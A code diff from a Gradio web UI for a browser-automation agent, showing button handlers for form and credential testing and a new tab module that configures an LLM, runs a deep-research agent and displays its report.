                    webui_manager.bu_chat_history.append({
                        "role": "assistant",
                        "content": f"✅ Form testing complete!\n\n📊 Results:\n- Total Tests: {summary.get('total_tests', 0)}\n- Passed: {summary.get('passed_tests', 0)}\n- Failed: {summary.get('failed_tests', 0)}\n- Success Rate: {summary.get('success_rate', 0)}%"
                    })
            else:
                webui_manager.bu_chat_history.append({
                    "role": "assistant",
                    "content": "❌ Intelligent form testing not available. Please run a regular task first to initialize the agent."
                })
        except Exception as e:
            webui_manager.bu_chat_history.append({
                "role": "assistant",
                "content": f"❌ Error in form testing: {str(e)}"
            })

        yield {chatbot: webui_manager.bu_chat_history}

    async def intelligent_credential_test_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
        """Wrapper for intelligent credential testing."""
        try:
            webui_manager.bu_chat_history.append({
                "role": "assistant",
                "content": "🔐 Starting intelligent credential testing... This will test various email/password combinations and security scenarios."
            })

            if webui_manager.bu_agent and hasattr(webui_manager.bu_agent, 'run_intelligent_credential_testing'):
                result = await webui_manager.bu_agent.run_intelligent_credential_testing()

                if "error" in result:
                    webui_manager.bu_chat_history.append({
                        "role": "assistant",
                        "content": f"❌ Credential testing error: {result['error']}"
                    })
                else:
                    summary = result.get('summary', {})
                    webui_manager.bu_chat_history.append({
                        "role": "assistant",
                        "content": f"✅ Credential testing complete!\n\n📊 Results:\n- Total Tests: {summary.get('total_tests', 0)}\n- Passed: {summary.get('passed_tests', 0)}\n- Failed: {summary.get('failed_tests', 0)}\n- Success Rate: {summary.get('success_rate', 0)}%"
                    })
            else:
                webui_manager.bu_chat_history.append({
                    "role": "assistant",
                    "content": "❌ Intelligent credential testing not available. Please run a regular task first to initialize the agent."
                })
        except Exception as e:
            webui_manager.bu_chat_history.append({
                "role": "assistant",
                "content": f"❌ Error in credential testing: {str(e)}"
            })

        yield {chatbot: webui_manager.bu_chat_history}

    async def ai_analysis_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
        """Wrapper for AI page analysis."""
        try:
            webui_manager.bu_chat_history.append({
                "role": "assistant",
                "content": "🤔 Starting AI page analysis... This will intelligently analyze the current page and generate testing strategies."
            })

            if webui_manager.bu_agent and hasattr(webui_manager.bu_agent, 'run_ai_thinking_analysis'):
                result = await webui_manager.bu_agent.run_ai_thinking_analysis()

                if "error" in result:
                    webui_manager.bu_chat_history.append({
                        "role": "assistant",
                        "content": f"❌ AI analysis error: {result['error']}"
                    })
                else:
                    page_analysis = result.get('page_analysis', {})
                    strategy = result.get('testing_strategy', {})

                    # Build a human-readable summary of the analysis result.
                    analysis_text = f"✅ AI analysis complete!\n\n"
                    analysis_text += f"📄 Page Type: {page_analysis.get('page_type', 'Unknown')}\n"
                    analysis_text += f"📝 Form Complexity: {page_analysis.get('form_complexity', 'Unknown')}\n"
                    analysis_text += f"🔒 Security Indicators: {len(page_analysis.get('security_indicators', []))}\n"
                    analysis_text += f"⚠️ Potential Issues: {len(page_analysis.get('potential_issues', []))}\n\n"
                    analysis_text += f"🎯 Testing Strategy:\n"
                    analysis_text += f"- Approach: {strategy.get('approach', 'Unknown')}\n"
                    analysis_text += f"- Focus Areas: {', '.join(strategy.get('focus_areas', []))}\n"
                    analysis_text += f"- Estimated Duration: {strategy.get('estimated_duration', 0)} minutes\n"

                    webui_manager.bu_chat_history.append({
                        "role": "assistant",
                        "content": analysis_text
                    })
            else:
                webui_manager.bu_chat_history.append({
                    "role": "assistant",
                    "content": "❌ AI analysis not available. Please run a regular task first to initialize the agent."
                })
        except Exception as e:
            webui_manager.bu_chat_history.append({
                "role": "assistant",
                "content": f"❌ Error in AI analysis: {str(e)}"
            })

        yield {chatbot: webui_manager.bu_chat_history}

    async def comprehensive_test_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
        """Wrapper for comprehensive intelligent testing."""
        try:
            webui_manager.bu_chat_history.append({
                "role": "assistant",
                "content": "🎯 Starting comprehensive intelligent testing... This will run all intelligent testing features including AI analysis, form testing, and credential testing."
            })

            if webui_manager.bu_agent and hasattr(webui_manager.bu_agent, 'run_comprehensive_intelligent_testing'):
                result = await webui_manager.bu_agent.run_comprehensive_intelligent_testing()

                if "error" in result:
                    webui_manager.bu_chat_history.append({
                        "role": "assistant",
                        "content": f"❌ Comprehensive testing error: {result['error']}"
                    })
                else:
                    summary = result.get('summary', {})
                    webui_manager.bu_chat_history.append({
                        "role": "assistant",
                        "content": f"✅ Comprehensive intelligent testing complete!\n\n📊 Summary:\n- AI Analysis: {'✅' if summary.get('ai_analysis_success') else '❌'}\n- Form Testing: {'✅' if summary.get('form_testing_success') else '❌'}\n- Credential Testing: {'✅' if summary.get('credential_testing_success') else '❌'}\n\nAll intelligent testing features have been executed. Check the detailed results above."
                    })
            else:
                webui_manager.bu_chat_history.append({
                    "role": "assistant",
                    "content": "❌ Comprehensive intelligent testing not available. Please run a regular task first to initialize the agent."
                })
        except Exception as e:
            webui_manager.bu_chat_history.append({
                "role": "assistant",
                "content": f"❌ Error in comprehensive testing: {str(e)}"
            })

        yield {chatbot: webui_manager.bu_chat_history}

    # --- Connect Event Handlers using the Wrappers --
    run_button.click(
        fn=submit_wrapper, inputs=all_managed_components, outputs=run_tab_outputs, trigger_mode="multiple"
    )
    user_input.submit(
        fn=submit_wrapper, inputs=all_managed_components, outputs=run_tab_outputs
    )
    stop_button.click(fn=stop_wrapper, inputs=None, outputs=run_tab_outputs)
    pause_resume_button.click(
        fn=pause_resume_wrapper, inputs=None, outputs=run_tab_outputs
    )
    clear_button.click(fn=clear_wrapper, inputs=None, outputs=run_tab_outputs)

    # Intelligent Testing Button Handlers
    intelligent_form_test_btn.click(fn=intelligent_form_test_wrapper, inputs=None, outputs=run_tab_outputs)
    intelligent_credential_test_btn.click(fn=intelligent_credential_test_wrapper, inputs=None, outputs=run_tab_outputs)
    ai_analysis_btn.click(fn=ai_analysis_wrapper, inputs=None, outputs=run_tab_outputs)
    comprehensive_test_btn.click(fn=comprehensive_test_wrapper, inputs=None, outputs=run_tab_outputs)
|
src/webui/components/deep_research_agent_tab.py
ADDED
|
@@ -0,0 +1,457 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import gradio as gr
|
| 2 |
+
from gradio.components import Component
|
| 3 |
+
from functools import partial
|
| 4 |
+
|
| 5 |
+
from src.webui.webui_manager import WebuiManager
|
| 6 |
+
from src.utils import config
|
| 7 |
+
import logging
|
| 8 |
+
import os
|
| 9 |
+
from typing import Any, Dict, AsyncGenerator, Optional, Tuple, Union
|
| 10 |
+
import asyncio
|
| 11 |
+
import json
|
| 12 |
+
from src.agent.deep_research.deep_research_agent import DeepResearchAgent
|
| 13 |
+
from src.utils import llm_provider
|
| 14 |
+
|
| 15 |
+
logger = logging.getLogger(__name__)
|
| 16 |
+
|
| 17 |
+
|
| 18 |
+
async def _initialize_llm(provider: Optional[str], model_name: Optional[str], temperature: float,
|
| 19 |
+
base_url: Optional[str], api_key: Optional[str], num_ctx: Optional[int] = None):
|
| 20 |
+
"""Initializes the LLM based on settings. Returns None if provider/model is missing."""
|
| 21 |
+
if not provider or not model_name:
|
| 22 |
+
logger.info("LLM Provider or Model Name not specified, LLM will be None.")
|
| 23 |
+
return None
|
| 24 |
+
try:
|
| 25 |
+
logger.info(f"Initializing LLM: Provider={provider}, Model={model_name}, Temp={temperature}")
|
| 26 |
+
# Use your actual LLM provider logic here
|
| 27 |
+
llm = llm_provider.get_llm_model(
|
| 28 |
+
provider=provider,
|
| 29 |
+
model_name=model_name,
|
| 30 |
+
temperature=temperature,
|
| 31 |
+
base_url=base_url or None,
|
| 32 |
+
api_key=api_key or None,
|
| 33 |
+
num_ctx=num_ctx if provider == "ollama" else None
|
| 34 |
+
)
|
| 35 |
+
return llm
|
| 36 |
+
except Exception as e:
|
| 37 |
+
logger.error(f"Failed to initialize LLM: {e}", exc_info=True)
|
| 38 |
+
gr.Warning(
|
| 39 |
+
f"Failed to initialize LLM '{model_name}' for provider '{provider}'. Please check settings. Error: {e}")
|
| 40 |
+
return None
|
| 41 |
+
|
| 42 |
+
|
| 43 |
+
def _read_file_safe(file_path: str) -> Optional[str]:
|
| 44 |
+
"""Safely read a file, returning None if it doesn't exist or on error."""
|
| 45 |
+
if not os.path.exists(file_path):
|
| 46 |
+
return None
|
| 47 |
+
try:
|
| 48 |
+
with open(file_path, 'r', encoding='utf-8') as f:
|
| 49 |
+
return f.read()
|
| 50 |
+
except Exception as e:
|
| 51 |
+
logger.error(f"Error reading file {file_path}: {e}")
|
| 52 |
+
return None
|
| 53 |
+
|
| 54 |
+
|
| 55 |
+
# --- Deep Research Agent Specific Logic ---
|
| 56 |
+
|
| 57 |
+
async def run_deep_research(webui_manager: WebuiManager, components: Dict[Component, Any]) -> AsyncGenerator[
    Dict[Component, Any], None]:
    """Handles initializing and running the DeepResearchAgent.

    Async generator used as a Gradio event handler: each yielded dict maps
    Gradio components to their updates.  Flow: read settings from the shared
    component registry, disable inputs, start the agent as an asyncio task,
    poll ``research_plan.md`` for progress while it runs, then display the
    final report and (in ``finally``) reset the UI.
    """

    # --- Get Components ---
    research_task_comp = webui_manager.get_component_by_id("deep_research_agent.research_task")
    resume_task_id_comp = webui_manager.get_component_by_id("deep_research_agent.resume_task_id")
    parallel_num_comp = webui_manager.get_component_by_id("deep_research_agent.parallel_num")
    save_dir_comp = webui_manager.get_component_by_id(
        "deep_research_agent.max_query")  # Note: component ID seems misnamed in original code
    start_button_comp = webui_manager.get_component_by_id("deep_research_agent.start_button")
    stop_button_comp = webui_manager.get_component_by_id("deep_research_agent.stop_button")
    markdown_display_comp = webui_manager.get_component_by_id("deep_research_agent.markdown_display")
    markdown_download_comp = webui_manager.get_component_by_id("deep_research_agent.markdown_download")
    mcp_server_config_comp = webui_manager.get_component_by_id("deep_research_agent.mcp_server_config")

    # --- 1. Get Task and Settings ---
    task_topic = components.get(research_task_comp, "").strip()
    task_id_to_resume = components.get(resume_task_id_comp, "").strip() or None
    max_parallel_agents = int(components.get(parallel_num_comp, 1))
    base_save_dir = components.get(save_dir_comp, "./tmp/deep_research").strip()
    # Path-traversal guard: any user-supplied save dir outside ./tmp/deep_research
    # is rejected and replaced with the default root.
    safe_root_dir = "./tmp/deep_research"
    normalized_base_save_dir = os.path.abspath(os.path.normpath(base_save_dir))
    if os.path.commonpath([normalized_base_save_dir, os.path.abspath(safe_root_dir)]) != os.path.abspath(safe_root_dir):
        logger.warning(f"Unsafe base_save_dir detected: {base_save_dir}. Using default directory.")
        normalized_base_save_dir = os.path.abspath(safe_root_dir)
    base_save_dir = normalized_base_save_dir
    mcp_server_config_str = components.get(mcp_server_config_comp)
    # NOTE(review): invalid JSON in the textbox raises here and aborts the run.
    mcp_config = json.loads(mcp_server_config_str) if mcp_server_config_str else None

    if not task_topic:
        gr.Warning("Please enter a research task.")
        yield {start_button_comp: gr.update(interactive=True)}  # Re-enable start button
        return

    # Store base save dir for stop handler
    webui_manager.dr_save_dir = base_save_dir
    os.makedirs(base_save_dir, exist_ok=True)

    # --- 2. Initial UI Update --- lock all inputs while the run is in flight.
    yield {
        start_button_comp: gr.update(value="⏳ Running...", interactive=False),
        stop_button_comp: gr.update(interactive=True),
        research_task_comp: gr.update(interactive=False),
        resume_task_id_comp: gr.update(interactive=False),
        parallel_num_comp: gr.update(interactive=False),
        save_dir_comp: gr.update(interactive=False),
        markdown_display_comp: gr.update(value="Starting research..."),
        markdown_download_comp: gr.update(value=None, interactive=False)
    }

    agent_task = None
    running_task_id = None
    plan_file_path = None
    report_file_path = None
    last_plan_content = None
    last_plan_mtime = 0

    try:
        # --- 3. Get LLM and Browser Config from other tabs ---
        # Access settings values via components dict, getting IDs from webui_manager
        def get_setting(tab: str, key: str, default: Any = None):
            # Looks up "<tab>.<key>" in the registry; missing components fall
            # back to `default` rather than raising.
            comp = webui_manager.id_to_component.get(f"{tab}.{key}")
            return components.get(comp, default) if comp else default

        # LLM Config (from agent_settings tab)
        llm_provider_name = get_setting("agent_settings", "llm_provider")
        llm_model_name = get_setting("agent_settings", "llm_model_name")
        # Temperature is clamped to a minimum of 0.5.
        llm_temperature = max(get_setting("agent_settings", "llm_temperature", 0.5), 0.5)
        llm_base_url = get_setting("agent_settings", "llm_base_url")
        llm_api_key = get_setting("agent_settings", "llm_api_key")
        ollama_num_ctx = get_setting("agent_settings", "ollama_num_ctx")

        llm = await _initialize_llm(
            llm_provider_name, llm_model_name, llm_temperature, llm_base_url, llm_api_key,
            ollama_num_ctx if llm_provider_name == "ollama" else None
        )
        if not llm:
            raise ValueError("LLM Initialization failed. Please check Agent Settings.")

        # Browser Config (from browser_settings tab)
        # Note: DeepResearchAgent constructor takes a dict, not full Browser/Context objects
        browser_config_dict = {
            "headless": get_setting("browser_settings", "headless", False),
            "disable_security": get_setting("browser_settings", "disable_security", False),
            "browser_binary_path": get_setting("browser_settings", "browser_binary_path"),
            "user_data_dir": get_setting("browser_settings", "browser_user_data_dir"),
            "window_width": int(get_setting("browser_settings", "window_w", 1280)),
            "window_height": int(get_setting("browser_settings", "window_h", 1100)),
            # Add other relevant fields if DeepResearchAgent accepts them
        }

        # --- 4. Initialize or Get Agent --- the agent instance is reused
        # across runs once created.
        if not webui_manager.dr_agent:
            webui_manager.dr_agent = DeepResearchAgent(
                llm=llm,
                browser_config=browser_config_dict,
                mcp_server_config=mcp_config
            )
            logger.info("DeepResearchAgent initialized.")

        # --- 5. Start Agent Run ---
        agent_run_coro = webui_manager.dr_agent.run(
            topic=task_topic,
            task_id=task_id_to_resume,
            save_dir=base_save_dir,
            max_parallel_browsers=max_parallel_agents
        )
        agent_task = asyncio.create_task(agent_run_coro)
        webui_manager.dr_current_task = agent_task

        # Wait briefly for the agent to start and potentially create the task ID/folder
        await asyncio.sleep(1.0)

        # Determine the actual task ID being used (agent sets this)
        running_task_id = webui_manager.dr_agent.current_task_id
        if not running_task_id:
            # Agent might not have set it yet, try to get from result later? Risky.
            # Or derive from resume_task_id if provided?
            running_task_id = task_id_to_resume
            if not running_task_id:
                logger.warning("Could not determine running task ID immediately.")
                # We can still monitor, but might miss initial plan if ID needed for path
            else:
                logger.info(f"Assuming task ID based on resume ID: {running_task_id}")
        else:
            logger.info(f"Agent started with Task ID: {running_task_id}")

        # NOTE(review): WebuiManager.init_deep_research_agent defines
        # `dr_agent_task_id`, but this module reads/writes `dr_task_id`
        # (created dynamically here) — confirm which name is intended.
        webui_manager.dr_task_id = running_task_id  # Store for stop handler

        # --- 6. Monitor Progress via research_plan.md ---
        if running_task_id:
            task_specific_dir = os.path.join(base_save_dir, str(running_task_id))
            plan_file_path = os.path.join(task_specific_dir, "research_plan.md")
            report_file_path = os.path.join(task_specific_dir, "report.md")
            logger.info(f"Monitoring plan file: {plan_file_path}")
        else:
            logger.warning("Cannot monitor plan file: Task ID unknown.")
            plan_file_path = None
        last_plan_content = None
        while not agent_task.done():
            update_dict = {}
            update_dict[resume_task_id_comp] = gr.update(value=running_task_id)
            agent_stopped = getattr(webui_manager.dr_agent, 'stopped', False)
            if agent_stopped:
                logger.info("Stop signal detected from agent state.")
                break  # Exit monitoring loop

            # Check and update research plan display
            if plan_file_path:
                try:
                    # mtime check avoids re-reading an unchanged file every tick.
                    current_mtime = os.path.getmtime(plan_file_path) if os.path.exists(plan_file_path) else 0
                    if current_mtime > last_plan_mtime:
                        logger.info(f"Detected change in {plan_file_path}")
                        plan_content = _read_file_safe(plan_file_path)
                        if last_plan_content is None or (
                                plan_content is not None and plan_content != last_plan_content):
                            update_dict[markdown_display_comp] = gr.update(value=plan_content)
                            last_plan_content = plan_content
                            last_plan_mtime = current_mtime
                        elif plan_content is None:
                            # File might have been deleted or became unreadable
                            last_plan_mtime = 0  # Reset to force re-read attempt later
                except Exception as e:
                    logger.warning(f"Error checking/reading plan file {plan_file_path}: {e}")
                    # Avoid continuous logging for the same error
                    await asyncio.sleep(2.0)

            # Yield updates if any
            if update_dict:
                yield update_dict

            await asyncio.sleep(1.0)  # Check file changes every second

        # --- 7. Task Finalization ---
        logger.info("Agent task processing finished. Awaiting final result...")
        final_result_dict = await agent_task  # Get result or raise exception
        logger.info(f"Agent run completed. Result keys: {final_result_dict.keys() if final_result_dict else 'None'}")

        # Try to get task ID from result if not known before
        if not running_task_id and final_result_dict and 'task_id' in final_result_dict:
            running_task_id = final_result_dict['task_id']
            webui_manager.dr_task_id = running_task_id
            task_specific_dir = os.path.join(base_save_dir, str(running_task_id))
            report_file_path = os.path.join(task_specific_dir, "report.md")
            logger.info(f"Task ID confirmed from result: {running_task_id}")

        # Prefer the on-disk report (downloadable); fall back to inline report
        # content from the result dict; otherwise show a "not found" notice.
        final_ui_update = {}
        if report_file_path and os.path.exists(report_file_path):
            logger.info(f"Loading final report from: {report_file_path}")
            report_content = _read_file_safe(report_file_path)
            if report_content:
                final_ui_update[markdown_display_comp] = gr.update(value=report_content)
                final_ui_update[markdown_download_comp] = gr.File(value=report_file_path,
                                                                 label=f"Report ({running_task_id}.md)",
                                                                 interactive=True)
            else:
                final_ui_update[markdown_display_comp] = gr.update(
                    value="# Research Complete\n\n*Error reading final report file.*")
        elif final_result_dict and 'report' in final_result_dict:
            logger.info("Using report content directly from agent result.")
            # If agent directly returns report content
            final_ui_update[markdown_display_comp] = gr.update(value=final_result_dict['report'])
            # Cannot offer download if only content is available
            final_ui_update[markdown_download_comp] = gr.update(value=None, label="Download Research Report",
                                                               interactive=False)
        else:
            logger.warning("Final report file not found and not in result dict.")
            final_ui_update[markdown_display_comp] = gr.update(value="# Research Complete\n\n*Final report not found.*")

        yield final_ui_update

    except Exception as e:
        logger.error(f"Error during Deep Research Agent execution: {e}", exc_info=True)
        gr.Error(f"Research failed: {e}")
        yield {markdown_display_comp: gr.update(value=f"# Research Failed\n\n**Error:**\n```\n{e}\n```")}

    finally:
        # --- 8. Final UI Reset --- always runs, including after stop/failure.
        webui_manager.dr_current_task = None  # Clear task reference
        webui_manager.dr_task_id = None  # Clear running task ID

        yield {
            start_button_comp: gr.update(value="▶️ Run", interactive=True),
            stop_button_comp: gr.update(interactive=False),
            research_task_comp: gr.update(interactive=True),
            resume_task_id_comp: gr.update(value="", interactive=True),
            parallel_num_comp: gr.update(interactive=True),
            save_dir_comp: gr.update(interactive=True),
            # Keep download button enabled if file exists
            markdown_download_comp: gr.update() if report_file_path and os.path.exists(report_file_path) else gr.update(
                interactive=False)
        }
|
| 291 |
+
|
| 292 |
+
|
| 293 |
+
async def stop_deep_research(webui_manager: WebuiManager) -> Dict[Component, Any]:
    """Handle the Stop button click for the deep-research tab.

    Signals the running DeepResearchAgent (if any) to stop, then returns a
    dict of Gradio component updates reflecting the stopped state.  The full
    UI reset (re-enabling inputs) is performed by the ``finally`` block of
    ``run_deep_research`` once its loop observes the stop.

    Args:
        webui_manager: Shared manager holding the agent, task handle,
            task id, save dir and the component registry.

    Returns:
        Mapping of Gradio components to their updates.
    """
    logger.info("Stop button clicked for Deep Research.")
    agent = webui_manager.dr_agent
    task = webui_manager.dr_current_task
    task_id = webui_manager.dr_task_id
    base_save_dir = webui_manager.dr_save_dir

    stop_button_comp = webui_manager.get_component_by_id("deep_research_agent.stop_button")
    start_button_comp = webui_manager.get_component_by_id("deep_research_agent.start_button")
    markdown_display_comp = webui_manager.get_component_by_id("deep_research_agent.markdown_display")
    markdown_download_comp = webui_manager.get_component_by_id("deep_research_agent.markdown_download")

    final_update = {
        stop_button_comp: gr.update(interactive=False, value="⏹️ Stopping...")
    }

    if agent and task and not task.done():
        logger.info("Signalling DeepResearchAgent to stop.")
        try:
            # Assuming stop is synchronous or sets a flag quickly
            await agent.stop()
        except Exception as e:
            logger.error(f"Error calling agent.stop(): {e}")

        # The run_deep_research loop should detect the stop and exit.
        # We yield an intermediate "Stopping..." state. The final reset is done by run_deep_research.

        # Try to show the final report if available after stopping
        await asyncio.sleep(1.5)  # Give agent a moment to write final files potentially
        report_file_path = None
        if task_id and base_save_dir:
            report_file_path = os.path.join(base_save_dir, str(task_id), "report.md")

        if report_file_path and os.path.exists(report_file_path):
            report_content = _read_file_safe(report_file_path)
            if report_content:
                final_update[markdown_display_comp] = gr.update(
                    value=report_content + "\n\n---\n*Research stopped by user.*")
                final_update[markdown_download_comp] = gr.File(value=report_file_path, label=f"Report ({task_id}.md)",
                                                              interactive=True)
            else:
                final_update[markdown_display_comp] = gr.update(
                    value="# Research Stopped\n\n*Error reading final report file after stop.*")
        else:
            final_update[markdown_display_comp] = gr.update(value="# Research Stopped by User")

        # Keep start button disabled, run_deep_research finally block will re-enable it.
        final_update[start_button_comp] = gr.update(interactive=False)

    else:
        logger.warning("Stop clicked but no active research task found.")
        # Reset UI state just in case.
        # Bug fix: the original looked up "deep_research_agent.max_iteration",
        # a component that create_deep_research_agent_tab never registers, so
        # get_component_by_id raised KeyError on this path.  Re-enable the
        # components that actually exist (parallel_num / max_query).
        final_update = {
            start_button_comp: gr.update(interactive=True),
            stop_button_comp: gr.update(interactive=False),
            webui_manager.get_component_by_id("deep_research_agent.research_task"): gr.update(interactive=True),
            webui_manager.get_component_by_id("deep_research_agent.resume_task_id"): gr.update(interactive=True),
            webui_manager.get_component_by_id("deep_research_agent.parallel_num"): gr.update(interactive=True),
            webui_manager.get_component_by_id("deep_research_agent.max_query"): gr.update(interactive=True),
        }

    return final_update
|
| 356 |
+
|
| 357 |
+
|
| 358 |
+
async def update_mcp_server(mcp_file: str, webui_manager: WebuiManager):
    """Reload the MCP server configuration from an uploaded JSON file.

    Closes the current DeepResearchAgent's MCP client first (its config is
    now stale), then validates the uploaded file and pretty-prints it for
    the config textbox.

    Args:
        mcp_file: Path of the uploaded file; may be None or empty.
        webui_manager: Shared manager that may hold a live DeepResearchAgent.

    Returns:
        Tuple of (pretty-printed JSON text or None,
        ``gr.update`` toggling the config textbox visibility).
    """
    if hasattr(webui_manager, "dr_agent") and webui_manager.dr_agent:
        logger.warning("⚠️ Close controller because mcp file has changed!")
        await webui_manager.dr_agent.close_mcp_client()

    if not mcp_file or not os.path.exists(mcp_file) or not mcp_file.endswith('.json'):
        logger.warning(f"{mcp_file} is not a valid MCP file.")
        return None, gr.update(visible=False)

    # Bug fix: a malformed or unreadable JSON file previously raised out of
    # this Gradio change-handler; treat it like an invalid file instead.
    try:
        with open(mcp_file, 'r', encoding='utf-8') as f:
            mcp_server = json.load(f)
    except (OSError, json.JSONDecodeError) as e:
        logger.warning(f"Failed to parse MCP file {mcp_file}: {e}")
        return None, gr.update(visible=False)

    return json.dumps(mcp_server, indent=2), gr.update(visible=True)
|
| 374 |
+
|
| 375 |
+
|
| 376 |
+
def create_deep_research_agent_tab(webui_manager: WebuiManager):
    """Build the Deep Research tab: MCP config upload, task inputs,
    run/stop buttons and report display, and wire their event handlers.

    All created components are registered with ``webui_manager`` under the
    ``deep_research_agent`` namespace so other handlers can look them up.
    """
    # NOTE(review): input_components is never used below — dead local.
    input_components = set(webui_manager.get_components())
    tab_components = {}

    with gr.Group():
        with gr.Row():
            mcp_json_file = gr.File(label="MCP server json", interactive=True, file_types=[".json"])
            # Hidden until a valid MCP JSON file is uploaded.
            mcp_server_config = gr.Textbox(label="MCP server", lines=6, interactive=True, visible=False)

    with gr.Group():
        research_task = gr.Textbox(label="Research Task", lines=5,
                                   value="Give me a detailed travel plan to Switzerland from June 1st to 10th.",
                                   interactive=True)
        with gr.Row():
            resume_task_id = gr.Textbox(label="Resume Task ID", value="",
                                        interactive=True)
            parallel_num = gr.Number(label="Parallel Agent Num", value=1,
                                     precision=0,
                                     interactive=True)
            # NOTE(review): misnamed — this component holds the save directory,
            # not a query count; run_deep_research reads it via the
            # "deep_research_agent.max_query" id.
            max_query = gr.Textbox(label="Research Save Dir", value="./tmp/deep_research",
                                   interactive=True)
    with gr.Row():
        stop_button = gr.Button("⏹️ Stop", variant="stop", scale=2)
        start_button = gr.Button("▶️ Run", variant="primary", scale=3)
    with gr.Group():
        markdown_display = gr.Markdown(label="Research Report")
        markdown_download = gr.File(label="Download Research Report", interactive=False)
    tab_components.update(
        dict(
            research_task=research_task,
            parallel_num=parallel_num,
            max_query=max_query,
            start_button=start_button,
            stop_button=stop_button,
            markdown_display=markdown_display,
            markdown_download=markdown_download,
            resume_task_id=resume_task_id,
            mcp_json_file=mcp_json_file,
            mcp_server_config=mcp_server_config,
        )
    )
